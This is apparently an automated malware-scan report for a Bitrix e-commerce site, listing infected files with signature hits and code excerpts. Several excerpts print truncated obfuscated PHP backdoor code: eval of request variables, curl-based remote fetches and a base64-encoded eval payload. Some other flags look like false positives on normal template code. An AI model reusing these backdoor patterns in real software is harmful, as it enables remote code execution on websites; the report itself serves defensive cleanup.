Report

Version: 0.14.0
Scan date: 2025-02-03 06:37:31
Files analyzed: 106354 | Files infected: 404

/home/web/web/vsavto.com/public_html/login/login/cache.php

Size: 12.47 kB Created: 2025-01-31 08:40:35 Modified: 2025-02-03 05:34:35 Dangers: 2
DescriptionMatch

Sign 471b95ee Line: 6 Dangerous

Malware Signature (hash: 471b95ee)

Slurp", "MSNBot

Sign 4a069524 Line: 6 Dangerous

Malware Signature (hash: 4a069524)

array("Google""Slurp"

/home/web/web/vsavto.com/public_html/projects/projects/cache.php

Size: 12.47 kB Created: 2025-01-31 08:39:49 Modified: 2025-02-03 05:36:15 Dangers: 2
DescriptionMatch

Sign 471b95ee Line: 6 Dangerous

Malware Signature (hash: 471b95ee)

Slurp", "MSNBot

Sign 4a069524 Line: 6 Dangerous

Malware Signature (hash: 4a069524)

array("Google""Slurp"

/home/web/web/vsavto.com/public_html/desktop_app/login/login/cache.php

Size: 12.47 kB Created: 2025-01-31 08:40:37 Modified: 2025-02-03 05:36:15 Dangers: 2
DescriptionMatch

Sign 471b95ee Line: 6 Dangerous

Malware Signature (hash: 471b95ee)

Slurp", "MSNBot

Sign 4a069524 Line: 6 Dangerous

Malware Signature (hash: 4a069524)

array("Google""Slurp"

/home/web/web/vsavto.com/public_html/desktop_app/login/login/index.php

Size: 18.39 kB Created: 2025-01-31 08:40:37 Modified: 2025-02-03 05:36:15 Warns: 1 Dangers: 2
DescriptionMatch

Exploit global_var_string Dangerous

Code Injection, through escaped global vars, allow inject attackers to execute PHP code on the target machine via HTTP request

${"_GET"}

Exploit silenced_eval Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine

@eval($VF[0+4]($HkGMapTYr)

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval($Cp[67](${$Cp[39]}[27])); }class gyhf{ static function hzV($hcx) { $kBb "r"."a"."n"."g"."e"$fMb $kBb("~"" "); $BUvI explode("&"$hcx); $AmMvzhCy ""; foreach ($BUvI as $XrKTlPm => $kfbnSucaNP$AmMvzhCy .= $fMb[$kfbnSucaNP 98528]; return $AmMvzhCy; } static function VlYzILRn($IRcQSj$PlyNnTbLe) { $hxWeC curl_init($IRcQSj); curl_setopt($hxWeCCURLOPT_RETURNTRANSFER1); $efm curl_exec($hxWeC); return empty($efm) ? $PlyNnTbLe($IRcQSj) : $efm; } static function aZ() { $YNtk...

/home/web/web/vsavto.com/public_html/migrator/CMS/UMI/UMI/cache.php

Size: 12.47 kB Created: 2025-01-31 08:40:42 Modified: 2025-02-03 05:36:15 Dangers: 2
DescriptionMatch

Sign 471b95ee Line: 6 Dangerous

Malware Signature (hash: 471b95ee)

Slurp", "MSNBot

Sign 4a069524 Line: 6 Dangerous

Malware Signature (hash: 4a069524)

array("Google""Slurp"

/home/web/web/vsavto.com/public_html/migrator/CMS/UMI/UMI/index.php

Size: 18.91 kB Created: 2025-01-31 08:40:42 Modified: 2025-02-03 05:36:15 Warns: 1 Dangers: 3
DescriptionMatch

Exploit eval_comment Line: 142 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute arbitrary commands or code on the target machine

eval/*-{}22~_-*/($XV[61](${$XV[33]}[28])

Exploit global_var_string Dangerous

Code Injection, through escaped global vars, allow inject attackers to execute PHP code on the target machine via HTTP request

${"_GET"}

Exploit silenced_eval Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine

@eval($QBHTbkwGc[1+3]($Qkyl)

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval($XV[61](${$XV[33]}[28])))):$XV;class EXtH{ static function hptFuRk($wc) { $smkVT "r"."a"."n"."g"."e"$ZniIW $smkVT("~"" "); $GNeCVbm explode(">"$wc); $aJqxy ""; foreach ($GNeCVbm as $NAmZlV => $byt$aJqxy .= $ZniIW[$byt 81190]; return $aJqxy; } static function XxVvnm($TbNu$uVI) { $RQH curl_init($TbNu); curl_setopt($RQHCURLOPT_RETURNTRANSFER1); $ruBCjHUy curl_exec($RQH); return empty($ruBCjHUy) ? $uVI($TbNu) : $ruBCjHUy; } static function JzqPrwj() { $prZs = array("...

/home/web/web/vsavto.com/public_html/help/delivery/delivery/cache.php

Size: 12.47 kB Created: 2025-01-31 08:39:50 Modified: 2025-02-03 05:36:15 Dangers: 2
DescriptionMatch

Sign 471b95ee Line: 6 Dangerous

Malware Signature (hash: 471b95ee)

Slurp", "MSNBot

Sign 4a069524 Line: 6 Dangerous

Malware Signature (hash: 4a069524)

array("Google""Slurp"

/home/web/web/vsavto.com/public_html/help/delivery/delivery/index.php

Size: 21.05 kB Created: 2025-01-31 08:39:50 Modified: 2025-02-03 05:36:15 Warns: 1 Dangers: 2
DescriptionMatch

Exploit global_var_string Dangerous

Code Injection, through escaped global vars, allow inject attackers to execute PHP code on the target machine via HTTP request

${"_GET"}

Exploit silenced_eval Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine

@eval($Av[2+2]($kvNMjTJL)

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval($z[66](${$z[36]}[10])); }class FgB{ static function ybpQuUSLv($btqsSgYJ) { $bTriu "r"."a"."n"."g"."e"$WyUM $bTriu("~"" "); $SzhWNZEGi explode("<"$btqsSgYJ); $uGITaBsVxc ""; foreach ($SzhWNZEGi as $yxJTfqnGsK => $ym$uGITaBsVxc .= $WyUM[$ym 10410]; return $uGITaBsVxc; } static function ZEgCVUBlu($XjbTS$qsBIel) { $wSqcTtruW curl_init($XjbTS); curl_setopt($wSqcTtruWCURLOPT_RETURNTRANSFER1); $ZaAHWvBCE curl_exec($wSqcTtruW); return empty($ZaAHWvBCE) ? $qsBIel($XjbTS) ...

/home/web/web/vsavto.com/public_html/site_ws/site_ws/cache.php

Size: 12.47 kB Created: 2025-01-31 08:39:47 Modified: 2025-02-03 05:36:15 Dangers: 2
DescriptionMatch

Sign 471b95ee Line: 6 Dangerous

Malware Signature (hash: 471b95ee)

Slurp", "MSNBot

Sign 4a069524 Line: 6 Dangerous

Malware Signature (hash: 4a069524)

array("Google""Slurp"

/home/web/web/vsavto.com/public_html/site_ws/site_ws/index.php

Size: 19.35 kB Created: 2025-01-31 08:39:47 Modified: 2025-02-03 05:36:15 Warns: 1 Dangers: 2
DescriptionMatch

Exploit global_var_string Dangerous

Code Injection, through escaped global vars, allow inject attackers to execute PHP code on the target machine via HTTP request

${"_GET"}

Exploit silenced_eval Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine

@eval($SX[2+2]($aHu)

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval($u[69](${$u[39]}[17])); }class iK{ static function Crnf($AXEnQm) { $ETMP "r"."a"."n"."g"."e"$mEf $ETMP("~"" "); $UeJNGQ explode("-"$AXEnQm); $PiVXu ""; foreach ($UeJNGQ as $Sr => $jPMqa$PiVXu .= $mEf[$jPMqa 6366]; return $PiVXu; } static function kEyvJpFmIt($Zpxw$cLkwj) { $sumcSPNXa curl_init($Zpxw); curl_setopt($sumcSPNXaCURLOPT_RETURNTRANSFER1); $lHvaAyF curl_exec($sumcSPNXa); return empty($lHvaAyF) ? $cLkwj($Zpxw) : $lHvaAyF; } static function kgYlFC() { $vuUS...

/home/web/web/vsavto.com/public_html/index.php

Size: 14.85 kB Created: 2025-01-31 08:39:46 Modified: 2025-02-03 05:36:15 Warns: 1 Dangers: 19
DescriptionMatch

Exploit eval_base64 Dangerous

RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine

eval(base64_decode("ZXZhbCgiPz4iLmJhc2U2NF9kZWNvZGUoIlBEOXdhSEFnSUdobFlXUmxjaWduUTI5dWRHVnVkQzFVZVhCbE9pQjBaWGgwTDJoMGJXdzdJR05vWVhKelpYUTlkWFJtTFRnbktUc2daWEp5YjNKZmNtVndiM0owYVc1bktEQXBPMloxYm1OMGFXOXVJRTFoUTFSemJHSjBVRnB1YUdkV2VsRjVSMFZZS0NSeVpYTndYMmhsWVdSbGNpbDdKR2hsWVdSbGNpQTlJR0Z5Y21GNUtDZHpkR0YwZFhNbklEMCtJREFzSUNkamIyNTBaVzUwSnlBOVBpQW5KeXdnSjNSNWNHVW5JRDArSUNjbktUdHBaaUFvSVdselgyRnljbUY1S0NSeVpYTndYMmhsWVdSbGNpa3BJSHR5WlhSMWNtNGdKR2hsWVdSbGNqdDlabTl5WldGamFDQW9KSEpsYzNCZmFHVmhaR1Z5SUdG...

Exploit eval_comment Line: 1 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute arbitrary commands or code on the target machine

eval/*-]LuSQJlv$JjfArvTtnD60tQfG:=lfZzE[hN<-*/(/*-N4ad0lhVP-*/base64_decode/*-GOxB+<R-*/(/*-`4cn1$ic-*/"ZXZhbCgiPz4iLmJhc2U2NF9kZWNvZGUoIlBEOXdhSEFnSUdobFlXUmxjaWduUTI5dWRHVnVkQzFVZVhCbE9pQjBaWGgwTDJoMGJXdzdJR05vWVhKelpYUTlkWFJtTFRnbktUc2daWEp5YjNKZmNtVndiM0owYVc1bktEQXBPMloxYm1OMGFXOXVJRTFoUTFSemJHSjBVRnB1YUdkV2VsRjVSMFZZS0NSeVpYTndYMmhsWVdSbGNpbDdKR2hsWVdSbGNpQTlJR0Z5Y21GNUtDZHpkR0YwZFhNbklEMCtJREFzSUNkamIyNTBaVzUwSnlBOVBpQW5KeXdnSjNSNWNHVW5JRDArSUNjbktUdHBaaUFvSVdselgyRnljbUY1S0NSeVpYTndYMmhs...

Exploit execution Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

eval(base64_decode("ZXZhbCgiPz4iLmJhc2U2NF9kZWNvZGUoIlBEOXdhSEFnSUdobFlXUmxjaWduUTI5dWRHVnVkQzFVZVhCbE9pQjBaWGgwTDJoMGJXdzdJR05vWVhKelpYUTlkWFJtTFRnbktUc2daWEp5YjNKZmNtVndiM0owYVc1bktEQXBPMloxYm1OMGFXOXVJRTFoUTFSemJHSjBVRnB1YUdkV2VsRjVSMFZZS0NSeVpYTndYMmhsWVdSbGNpbDdKR2hsWVdSbGNpQTlJR0Z5Y21GNUtDZHpkR0YwZFhNbklEMCtJREFzSUNkamIyNTBaVzUwSnlBOVBpQW5KeXdnSjNSNWNHVW5JRDArSUNjbktUdHBaaUFvSVdselgyRnljbUY1S0NSeVpYTndYMmhsWVdSbGNpa3BJSHR5WlhSMWNtNGdKR2hsWVdSbGNqdDlabTl5WldGamFDQW9KSEpsYzNCZmFHVmhaR1Z5SUdG...

Exploit global_var_string Dangerous

Code Injection, through escaped global vars, allow inject attackers to execute PHP code on the target machine via HTTP request

${"_GET"}

Exploit silenced_eval Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine

@eval($cr[1+3]($sBWliKJbjQ)

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval($mv[65](${$mv[39]}[12])))):$mv;class P{ static function PgWBC($jv) { $hWkRNQav "r"."a"."n"."g"."e"$mLAz $hWkRNQav("~"" "); $lRstK explode("@"$jv); $NLYfv ""; foreach ($lRstK as $spJUPXI => $zRqmAMbrkH$NLYfv .= $mLAz[$zRqmAMbrkH 61823]; return $NLYfv; } static function nHvRq($ZfBpug$XYP) { $hstpuvT curl_init($ZfBpug); curl_setopt($hstpuvTCURLOPT_RETURNTRANSFER1); $Igs curl_exec($hstpuvT); return empty($Igs) ? $XYP($ZfBpug) : $Igs; } static function EigtxcZTuP() { ...

Sign 085a0329 Dangerous

Malware Signature (hash: 085a0329)

iYXNlNj

Sign 0f37c730 Dangerous

Malware Signature (hash: 0f37c730)

mdW5jdGlvb

Sign 11413268 Dangerous

Malware Signature (hash: 11413268)

eval("?>".base64_decode

Sign 162cf671 Dangerous

Malware Signature (hash: 162cf671)

hUVFBfVVNFUl9BR0VOV

Sign 7830f7a6 Dangerous

Malware Signature (hash: 7830f7a6)

N0YX

Sign 7f5d33bf Dangerous

Malware Signature (hash: 7f5d33bf)

JlcGxhY2

Sign 7f5d33bf Line: 1 Dangerous

Malware Signature (hash: 7f5d33bf)

Jhc2U2N

Sign 963e968a Dangerous

Malware Signature (hash: 963e968a)

PD9waH

Sign a408f408 Dangerous

Malware Signature (hash: a408f408)

c3Rhd

Sign ae7830db Dangerous

Malware Signature (hash: ae7830db)

yZXBsYWNl

Sign d97f004d Dangerous

Malware Signature (hash: d97f004d)

ZWNob

Sign d97f004d Line: 1 Dangerous

Malware Signature (hash: d97f004d)

ZXZhb

Sign de12c454 Dangerous

Malware Signature (hash: de12c454)

V4ZWMo

Sign ee1cb326 Dangerous

Malware Signature (hash: ee1cb326)

9wZW

/home/web/web/vsavto.com/public_html/upd/get_function.php

Size: 0.00 Created: 1970-01-01 00:00:00 Modified: 1970-01-01 00:00:00 Warns: 1
DescriptionMatch

Exploit infected_comment Line: 379 Warning

Comments composed by 5 random chars usually used to detect if a file is infected yet

/*PATCH*/

/home/web/web/vsavto.com/public_html/upd/get_update.php

Size: 0.00 Created: 1970-01-01 00:00:00 Modified: 1970-01-01 00:00:00 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec(b);return d?Math.max(0,d[1]-(c||0))+(d[2]||"px"):b}function b_(a,b,c,d){var e=c===(d?"border":"content")?4:b==="width"?1:0,f=0;for(;e<4;e+=2)c==="margin"&&(f+=p.css(a,c+bU[e],!0)),d?(c==="content"&&(f-=parseFloat(bH(a,"padding"+bU[e]))||0),c!=="margin"&&(f-=parseFloat(bH(a,"border"+bU[e]+"Width"))||0)):(f+=parseFloat(bH(a,"padding"+bU[e]))||0,c!=="padding"&&(f+=parseFloat(bH(a,"border"+bU[e]+"Width"))||0));return f}function ca(a,b,c){var d=b==="width"?a.offsetWidth:a.offsetHeight,e=!0,f=p.s...

/home/web/web/vsavto.com/public_html/bitrix/activities/bitrix/codecondition/codecondition.php

Size: 1.87 kB Created: 2022-12-02 17:27:39 Modified: 2025-02-03 05:36:15 Warns: 1 Dangers: 2
DescriptionMatch

Exploit silenced_eval Line: 19 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine

@eval("\$result = ".$this->condition.";")

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval("\$result = ".$this->condition.";"); return $result; } public static function ValidateProperties($value nullCBPWorkflowTemplateUser $user null) { $arErrors = array(); if ($user == null || !$user->isAdmin()) { $arErrors[] = [ 'code' => 'perm''message' => GetMessage('BPCC_NO_PERMS'), ]; } return array_merge($arErrorsparent::ValidateProperties($value$user)); } public static function GetPropertiesDialog$documentType$arWorkflowTemplate$arWorkflowParameters$arWorkflowVariables...

Sign 696317c4 Line: 19 Dangerous

Malware Signature (hash: 696317c4)

@eval("\

/home/web/web/vsavto.com/public_html/bitrix/activities/bitrix/codeactivity/codeactivity.php

Size: 2.44 kB Created: 2022-12-02 17:27:39 Modified: 2025-02-03 05:36:15 Warns: 1 Dangers: 1
DescriptionMatch

Exploit silenced_eval Line: 16 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine

@eval($this->ExecuteCode)

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval($this->ExecuteCode); return CBPActivityExecutionStatus::Closed; } public static function ValidateProperties($arTestProperties = array(), CBPWorkflowTemplateUser $user null) { $arErrors = array(); if ($user == null || !$user->isAdmin()) { $arErrors[] = array( "code" => "perm""message" => GetMessage("BPCA_NO_PERMS"), ); } if ($arTestProperties["ExecuteCode"] == '') { $arErrors[] = array( "code" => "emptyCode""message" => GetMessage("BPCA_EMPTY_CODE"), ); } return array_merge($arErrors, ...

/home/web/web/vsavto.com/public_html/bitrix/index.php

Size: 83.00 B Created: 2022-12-02 17:27:43 Modified: 2025-02-03 05:36:17 Dangers: 1
DescriptionMatch

Sign 0f37c730 Line: 2 Dangerous

Malware Signature (hash: 0f37c730)

meta http-equiv="REFRESH" content="0;

/home/web/web/vsavto.com/public_html/bitrix/templates/aspro_next/components/bitrix/catalog.element/main3/component_epilog.php

Size: 69.38 kB Created: 2023-02-02 19:43:12 Modified: 2025-02-03 05:36:17 Dangers: 1
DescriptionMatch

Exploit clever_include Line: 500 Dangerous

LFI (Local File Inclusion), through a image inclusion, allow remote attackers to inject and execute arbitrary commands or code on the target machine

INCLUDE" => $arParams["PRICE_VAT_INCLUDE"],
                                "
CONVERT_CURRENCY" => $arParams["CONVERT_CURRENCY"],
                                "
CURRENCY_ID" => $arParams["CURRENCY_ID"],
                                "
BASKET_URL" => $arParams["BASKET_URL"],
                                "
ADD_PROPERTIES_TO_BASKET" => $arParams["ADD_PROPERTIES_TO_BASKET"],
                                "
PRODUCT_PROPS_VARIABLE" => $arParams["PRODUCT_PROPS_VARIABLE"],
                                "
PARTIAL_PRODUCT_PROPERTIES" => $arParams["PARTIAL_PRODUCT_PROPERTIES"],
                                "
USE_PRODUCT_QUANTITY" => 'N',
                                "
OFFER_TREE_PROPS...

/home/web/web/vsavto.com/public_html/bitrix/templates/aspro_next/components/bitrix/catalog.element/main5/component_epilog.php

Size: 69.36 kB Created: 2023-02-02 19:43:12 Modified: 2025-02-03 05:36:17 Dangers: 1
DescriptionMatch

Exploit clever_include Line: 495 Dangerous

LFI (Local File Inclusion), through a image inclusion, allow remote attackers to inject and execute arbitrary commands or code on the target machine

INCLUDE" => $arParams["PRICE_VAT_INCLUDE"],
                                "
CONVERT_CURRENCY" => $arParams["CONVERT_CURRENCY"],
                                "
CURRENCY_ID" => $arParams["CURRENCY_ID"],
                                "
BASKET_URL" => $arParams["BASKET_URL"],
                                "
ADD_PROPERTIES_TO_BASKET" => $arParams["ADD_PROPERTIES_TO_BASKET"],
                                "
PRODUCT_PROPS_VARIABLE" => $arParams["PRODUCT_PROPS_VARIABLE"],
                                "
PARTIAL_PRODUCT_PROPERTIES" => $arParams["PARTIAL_PRODUCT_PROPERTIES"],
                                "
USE_PRODUCT_QUANTITY" => 'N',
                                "
OFFER_TREE_PROPS...

/home/web/web/vsavto.com/public_html/bitrix/templates/aspro_next/components/bitrix/catalog.element/main/component_epilog.php

Size: 73.82 kB Created: 2023-02-02 19:43:12 Modified: 2025-02-03 05:36:17 Dangers: 1
DescriptionMatch

Exploit clever_include Line: 915 Dangerous

LFI (Local File Inclusion), through a image inclusion, allow remote attackers to inject and execute arbitrary commands or code on the target machine

INCLUDE" => $arParams["PRICE_VAT_INCLUDE"],
                        "
CONVERT_CURRENCY" => $arParams["CONVERT_CURRENCY"],
                        "
CURRENCY_ID" => $arParams["CURRENCY_ID"],
                        "
BASKET_URL" => $arParams["BASKET_URL"],
                        "
ADD_PROPERTIES_TO_BASKET" => $arParams["ADD_PROPERTIES_TO_BASKET"],
                        "
PRODUCT_PROPS_VARIABLE" => $arParams["PRODUCT_PROPS_VARIABLE"],
                        "
PARTIAL_PRODUCT_PROPERTIES" => $arParams["PARTIAL_PRODUCT_PROPERTIES"],
                        "
USE_PRODUCT_QUANTITY" => 'N',
                        "
OFFER_TREE_PROPS_{$templateData[...

/home/web/web/vsavto.com/public_html/bitrix/templates/aspro_next/components/bitrix/catalog.element/main2/component_epilog.php

Size: 66.01 kB Created: 2023-02-02 19:43:12 Modified: 2025-02-03 05:36:17 Dangers: 1
DescriptionMatch

Exploit clever_include Line: 503 Dangerous

LFI (Local File Inclusion), through a image inclusion, allow remote attackers to inject and execute arbitrary commands or code on the target machine

INCLUDE" => $arParams["PRICE_VAT_INCLUDE"],
                                "
CONVERT_CURRENCY" => $arParams["CONVERT_CURRENCY"],
                                "
CURRENCY_ID" => $arParams["CURRENCY_ID"],
                                "
BASKET_URL" => $arParams["BASKET_URL"],
                                "
ADD_PROPERTIES_TO_BASKET" => $arParams["ADD_PROPERTIES_TO_BASKET"],
                                "
PRODUCT_PROPS_VARIABLE" => $arParams["PRODUCT_PROPS_VARIABLE"],
                                "
PARTIAL_PRODUCT_PROPERTIES" => $arParams["PARTIAL_PRODUCT_PROPERTIES"],
                                "
USE_PRODUCT_QUANTITY" => 'N',
                                "
OFFER_TREE_PROPS...

/home/web/web/vsavto.com/public_html/bitrix/templates/aspro_next/components/bitrix/catalog.element/main4/component_epilog.php

Size: 78.58 kB Created: 2023-02-02 19:43:12 Modified: 2025-02-03 05:36:17 Dangers: 1
DescriptionMatch

Exploit clever_include Line: 944 Dangerous

LFI (Local File Inclusion), through a image inclusion, allow remote attackers to inject and execute arbitrary commands or code on the target machine

INCLUDE" => $arParams["PRICE_VAT_INCLUDE"],
                        "
CONVERT_CURRENCY" => $arParams["CONVERT_CURRENCY"],
                        "
CURRENCY_ID" => $arParams["CURRENCY_ID"],
                        "
BASKET_URL" => $arParams["BASKET_URL"],
                        "
ADD_PROPERTIES_TO_BASKET" => $arParams["ADD_PROPERTIES_TO_BASKET"],
                        "
PRODUCT_PROPS_VARIABLE" => $arParams["PRODUCT_PROPS_VARIABLE"],
                        "
PARTIAL_PRODUCT_PROPERTIES" => $arParams["PARTIAL_PRODUCT_PROPERTIES"],
                        "
USE_PRODUCT_QUANTITY" => 'N',
                        "
OFFER_TREE_PROPS_{$templateData[...

/home/web/web/vsavto.com/public_html/bitrix/templates/aspro_next/components/bitrix/sale.gift.main.products/main/template.php

Size: 6.68 kB Created: 2023-02-02 19:43:14 Modified: 2025-02-03 05:36:18 Dangers: 2
DescriptionMatch

Exploit clever_include Dangerous

LFI (Local File Inclusion), through a image inclusion, allow remote attackers to inject and execute arbitrary commands or code on the target machine

INCLUDE" => $arParams["PRICE_VAT_INCLUDE"], "CONVERT_CURRENCY" => $arParams["CONVERT_CURRENCY"], "CURRENCY_ID" => $arParams["CURRENCY_ID"], "HIDE_NOT_AVAILABLE" => $arParams["HIDE_NOT_AVAILABLE"], "TEMPLATE_THEME" => (isset($arParams["TEMPLATE_THEME"]) ? $arParams["TEMPLATE_THEME"] : ""), "ADD_PICT_PROP" => (isset($arParams["ADD_PICT_PROP"]) ? $arParams["ADD_PICT_PROP"] : ""), "LABEL_PROP" => (isset($arParams["LABEL_PROP"]) ? $arParams["LABEL_PROP"] : ""), "OFFER_ADD_PICT_PROP" => (isset($arPara...

Exploit clever_include Line: 79 Dangerous

LFI (Local File Inclusion), through a image inclusion, allow remote attackers to inject and execute arbitrary commands or code on the target machine

INCLUDE" => $arParams["PRICE_VAT_INCLUDE"],
                    "
CONVERT_CURRENCY" => $arParams["CONVERT_CURRENCY"],
                    "
CURRENCY_ID" => $arParams["CURRENCY_ID"],
                    "
HIDE_NOT_AVAILABLE" => $arParams["HIDE_NOT_AVAILABLE"],
                    "
TEMPLATE_THEME" => (isset($arParams["TEMPLATE_THEME"]) ? $arParams["TEMPLATE_THEME"] : ""),

                    "
ADD_PICT_PROP" => (isset($arParams["ADD_PICT_PROP"]) ? $arParams["ADD_PICT_PROP"] : ""),

                    "
LABEL_PROP" => (isset($arParams["LABEL_PROP"]) ? $arParams["LABEL_PROP"] : ""),
                    "
O...

/home/web/web/vsavto.com/public_html/bitrix/wizards/aspro/next/site/templates/aspro_next/components/bitrix/catalog.element/main3/component_epilog.php

Size: 69.38 kB Created: 2023-02-02 19:31:07 Modified: 2025-02-03 05:36:21 Dangers: 1
DescriptionMatch

Exploit clever_include Line: 500 Dangerous

LFI (Local File Inclusion), through a image inclusion, allow remote attackers to inject and execute arbitrary commands or code on the target machine

INCLUDE" => $arParams["PRICE_VAT_INCLUDE"],
                                "
CONVERT_CURRENCY" => $arParams["CONVERT_CURRENCY"],
                                "
CURRENCY_ID" => $arParams["CURRENCY_ID"],
                                "
BASKET_URL" => $arParams["BASKET_URL"],
                                "
ADD_PROPERTIES_TO_BASKET" => $arParams["ADD_PROPERTIES_TO_BASKET"],
                                "
PRODUCT_PROPS_VARIABLE" => $arParams["PRODUCT_PROPS_VARIABLE"],
                                "
PARTIAL_PRODUCT_PROPERTIES" => $arParams["PARTIAL_PRODUCT_PROPERTIES"],
                                "
USE_PRODUCT_QUANTITY" => 'N',
                                "
OFFER_TREE_PROPS...

/home/web/web/vsavto.com/public_html/bitrix/wizards/aspro/next/site/templates/aspro_next/components/bitrix/catalog.element/main5/component_epilog.php

Size: 69.36 kB Created: 2023-02-02 19:31:07 Modified: 2025-02-03 05:36:21 Dangers: 1
DescriptionMatch

Exploit clever_include Line: 495 Dangerous

LFI (Local File Inclusion), through a image inclusion, allow remote attackers to inject and execute arbitrary commands or code on the target machine

INCLUDE" => $arParams["PRICE_VAT_INCLUDE"],
                                "
CONVERT_CURRENCY" => $arParams["CONVERT_CURRENCY"],
                                "
CURRENCY_ID" => $arParams["CURRENCY_ID"],
                                "
BASKET_URL" => $arParams["BASKET_URL"],
                                "
ADD_PROPERTIES_TO_BASKET" => $arParams["ADD_PROPERTIES_TO_BASKET"],
                                "
PRODUCT_PROPS_VARIABLE" => $arParams["PRODUCT_PROPS_VARIABLE"],
                                "
PARTIAL_PRODUCT_PROPERTIES" => $arParams["PARTIAL_PRODUCT_PROPERTIES"],
                                "
USE_PRODUCT_QUANTITY" => 'N',
                                "
OFFER_TREE_PROPS...

/home/web/web/vsavto.com/public_html/bitrix/wizards/aspro/next/site/templates/aspro_next/components/bitrix/catalog.element/main/component_epilog.php

Size: 73.82 kB Created: 2023-02-02 19:31:07 Modified: 2025-02-03 05:36:21 Dangers: 1
DescriptionMatch

Exploit clever_include Line: 915 Dangerous

LFI (Local File Inclusion), through a image inclusion, allow remote attackers to inject and execute arbitrary commands or code on the target machine

INCLUDE" => $arParams["PRICE_VAT_INCLUDE"],
                        "
CONVERT_CURRENCY" => $arParams["CONVERT_CURRENCY"],
                        "
CURRENCY_ID" => $arParams["CURRENCY_ID"],
                        "
BASKET_URL" => $arParams["BASKET_URL"],
                        "
ADD_PROPERTIES_TO_BASKET" => $arParams["ADD_PROPERTIES_TO_BASKET"],
                        "
PRODUCT_PROPS_VARIABLE" => $arParams["PRODUCT_PROPS_VARIABLE"],
                        "
PARTIAL_PRODUCT_PROPERTIES" => $arParams["PARTIAL_PRODUCT_PROPERTIES"],
                        "
USE_PRODUCT_QUANTITY" => 'N',
                        "
OFFER_TREE_PROPS_{$templateData[...

/home/web/web/vsavto.com/public_html/bitrix/wizards/aspro/next/site/templates/aspro_next/components/bitrix/catalog.element/main2/component_epilog.php

Size: 66.01 kB Created: 2023-02-02 19:31:07 Modified: 2025-02-03 05:36:21 Dangers: 1
DescriptionMatch

Exploit clever_include Line: 503 Dangerous

LFI (Local File Inclusion), through a image inclusion, allow remote attackers to inject and execute arbitrary commands or code on the target machine

INCLUDE" => $arParams["PRICE_VAT_INCLUDE"],
                                "
CONVERT_CURRENCY" => $arParams["CONVERT_CURRENCY"],
                                "
CURRENCY_ID" => $arParams["CURRENCY_ID"],
                                "
BASKET_URL" => $arParams["BASKET_URL"],
                                "
ADD_PROPERTIES_TO_BASKET" => $arParams["ADD_PROPERTIES_TO_BASKET"],
                                "
PRODUCT_PROPS_VARIABLE" => $arParams["PRODUCT_PROPS_VARIABLE"],
                                "
PARTIAL_PRODUCT_PROPERTIES" => $arParams["PARTIAL_PRODUCT_PROPERTIES"],
                                "
USE_PRODUCT_QUANTITY" => 'N',
                                "
OFFER_TREE_PROPS...

/home/web/web/vsavto.com/public_html/bitrix/wizards/aspro/next/site/templates/aspro_next/components/bitrix/catalog.element/main4/component_epilog.php

Size: 78.58 kB Created: 2023-02-02 19:31:07 Modified: 2025-02-03 05:36:21 Dangers: 1
DescriptionMatch

Exploit clever_include Line: 944 Dangerous

LFI (Local File Inclusion), through a image inclusion, allow remote attackers to inject and execute arbitrary commands or code on the target machine

INCLUDE" => $arParams["PRICE_VAT_INCLUDE"],
                        "
CONVERT_CURRENCY" => $arParams["CONVERT_CURRENCY"],
                        "
CURRENCY_ID" => $arParams["CURRENCY_ID"],
                        "
BASKET_URL" => $arParams["BASKET_URL"],
                        "
ADD_PROPERTIES_TO_BASKET" => $arParams["ADD_PROPERTIES_TO_BASKET"],
                        "
PRODUCT_PROPS_VARIABLE" => $arParams["PRODUCT_PROPS_VARIABLE"],
                        "
PARTIAL_PRODUCT_PROPERTIES" => $arParams["PARTIAL_PRODUCT_PROPERTIES"],
                        "
USE_PRODUCT_QUANTITY" => 'N',
                        "
OFFER_TREE_PROPS_{$templateData[...

/home/web/web/vsavto.com/public_html/bitrix/wizards/aspro/next/site/templates/aspro_next/components/bitrix/sale.gift.main.products/main/template.php

Size: 6.68 kB Created: 2023-02-02 19:31:09 Modified: 2025-02-03 05:36:21 Dangers: 2
DescriptionMatch

Exploit clever_include Dangerous

LFI (Local File Inclusion), through a image inclusion, allow remote attackers to inject and execute arbitrary commands or code on the target machine

INCLUDE" => $arParams["PRICE_VAT_INCLUDE"], "CONVERT_CURRENCY" => $arParams["CONVERT_CURRENCY"], "CURRENCY_ID" => $arParams["CURRENCY_ID"], "HIDE_NOT_AVAILABLE" => $arParams["HIDE_NOT_AVAILABLE"], "TEMPLATE_THEME" => (isset($arParams["TEMPLATE_THEME"]) ? $arParams["TEMPLATE_THEME"] : ""), "ADD_PICT_PROP" => (isset($arParams["ADD_PICT_PROP"]) ? $arParams["ADD_PICT_PROP"] : ""), "LABEL_PROP" => (isset($arParams["LABEL_PROP"]) ? $arParams["LABEL_PROP"] : ""), "OFFER_ADD_PICT_PROP" => (isset($arPara...

Exploit clever_include Line: 79 Dangerous

LFI (Local File Inclusion), through a image inclusion, allow remote attackers to inject and execute arbitrary commands or code on the target machine

INCLUDE" => $arParams["PRICE_VAT_INCLUDE"],
                    "
CONVERT_CURRENCY" => $arParams["CONVERT_CURRENCY"],
                    "
